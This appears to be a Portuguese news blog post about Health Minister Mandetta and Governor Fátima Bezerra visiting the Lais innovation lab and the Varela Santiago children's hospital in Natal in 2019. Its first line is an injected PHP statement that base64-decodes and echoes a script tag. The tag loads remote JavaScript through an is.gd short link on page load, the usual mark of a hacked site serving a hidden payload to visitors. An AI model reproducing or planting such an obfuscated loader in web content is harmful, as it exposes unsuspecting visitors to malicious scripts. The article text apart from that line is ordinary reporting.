$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Governadora acompanha ministro Mandetta em visita ao Lais e ao Varela Santiago

Governadora acompanha ministro Mandetta em visita ao Lais e ao Varela Santiago
17 Ago 2019

A vinda do ministro Luiz Henrique Mandetta a Natal rendeu ontem uma visita ao Laboratório de Inovação Tecnológica em Saúde (Lais), instalado no Hospital Universitário Onofre Lopes (HUOL/UFRN), e outra ao Hospital Infantil Varela Santiago. Para a governadora Fátima Bezerra, que o acompanhou, junto com o secretário de Estado da Saúde Cipriano Maia, a atitude do ministro de ver pessoalmente o Lais funcionando simboliza o compromisso do seu ministério com as políticas públicas de saúde.

“E assim deve ser, para continuar apoiando as ações deste laboratório pelo que ele significa para nós, pois é uma verdadeira revolução diante do desafio que o mundo contemporâneo coloca cada vez mais no contexto da saúde”, declarou. Sobre o Hospital Varela Santiago, ela reiterou o agradecimento feito pelo diretor, médico Paulo Xavier, pela visita e reafirmou compromisso firmado com a direção de renovar o convênio com o hospital que é a maior referência em complexidade em atenção à criança.

No Lais, cuja maior característica é interdisciplinaridade entre a Medicina e as engenharias, a comitiva foi guiada pelo coordenador Ricardo Valentim, doutor em Engenharia Mecânica. Foram apresentadas as bases de pesquisa em Saúde, Ciência e Tecnologia, cujo foco é o tratamento de ponta para sífilis congênita e prematura, seguida do laboratório de Avaliação Audiológica, que desenvolveu um software de uso obrigatório (através de portaria presidencial, desde 2017) por crianças da rede pública de ensino com problemas auditivos.

A governadora e o ministro também foram apresentados à turma de alunos de nível médio e superior que fazem o curso Formação em Desenvolvimento Full Stack em Sistema de Saúde, que formas jovens aptos a trabalhar com tecnologias avançadas de programação, voltadas para aumentar a eficácia dos tratamentos médico-hospitalares. Por último, visitaram os laboratórios de bioengenharia, que desenvolve próteses e equipamentos como uma caneta de plasma para saúde bucal, que promove a remoção de tártaro e realiza tratamento de cárie sem uso da temida broca odontológica, e a base de tecnologia assistiva.

O ministro Mandetta reconheceu a importância do Lais no cenário nacional e mundial, uma vez que o laboratório possui projetos que são aplicados em 30 países, e confirma compromisso em continuar apoiando as inciativas do mesmo. “A UFRN é uma grande universidade. Tenho certeza de que daqui saem grandes cabeças. O Rio Grande do Norte sempre foi um lugar de vanguarda, sempre deu um passo à frente, sempre questionou muito. A Ciência aqui encontra um bom ambiente”, declarou ao final da visita.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *